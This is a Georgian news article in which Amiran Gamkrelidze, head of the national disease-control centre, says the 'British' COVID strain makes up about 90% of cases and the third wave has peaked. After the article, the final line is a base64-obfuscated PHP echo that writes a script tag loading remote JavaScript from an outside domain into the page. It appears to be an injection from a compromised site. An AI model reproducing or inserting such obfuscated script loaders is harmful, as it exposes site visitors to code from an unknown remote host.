celsiusi
ავერსი საქკაბელი
დავადებათა კონტროლის ეროვნული ცენტრის დირექტორის ამირან გამყრელიძის განცხადებით, ქვეყანაში ამჟამად თითქმის სრულად “ბრიტანული შტამი” ცირკულირებს. ამის შესახებ გამყრელიძემ საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა. 
 
“ამჟამად ჩვენთან 90%-ი “ბრიტანული შტამი” ცირკულირებს, შეიძლება ითქვას, რომ თითქმის სრულად “ბრიტანული შტამია” რაც შეეხება ინდურ შტამს ამ ეტაპზე ინდური შტამი საქართველოში ჯერ არ დაფიქსირებულა”- განაცხადა ამირან გამყრელიძემ. 
 
მისივე მოსაზრებით, ამ დროისთვის ქვეყანა მესამე ტალღის ე.წ პიკურ პერიოდში იმყოფება.
 
“მე ადრეც გითხარით, რომ მესამე ტალღის ასე ვთქვათ პიკური პერიოდი იქნებოდა აპრილის დასასრულიდან  მაისის პირველი ორი კვირა, ასე რომ ახლა შეიძლება ვთქვათ , რომ პიკიში ვიმყოფებით. აი როდიდან დაიწყება დაღმა სვლა ეს უკვე დამოკიდებულია იმაზე, თუ რამდენად დავიცავთ რეგულაციებს და რეკომენდაციებს. აღდგომის დღესასწაულის და არდადეგების შემდგომ რამდენად ნაკლები დაზიანებით გამოვალთ ამ პერიოდიდან, ანუ გვექნება თუ არა მაღალი პროცენტი პირვადის ტარების, თავს ავარიდებთ თუ არა დიდ წვეულებებს და ყველა იმ ფაქტორს რაც ვირუსის გავრცელებას უწყობს ხელს.”- განაცხადა გამყრელიძემ. 
 
 
 
3329
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");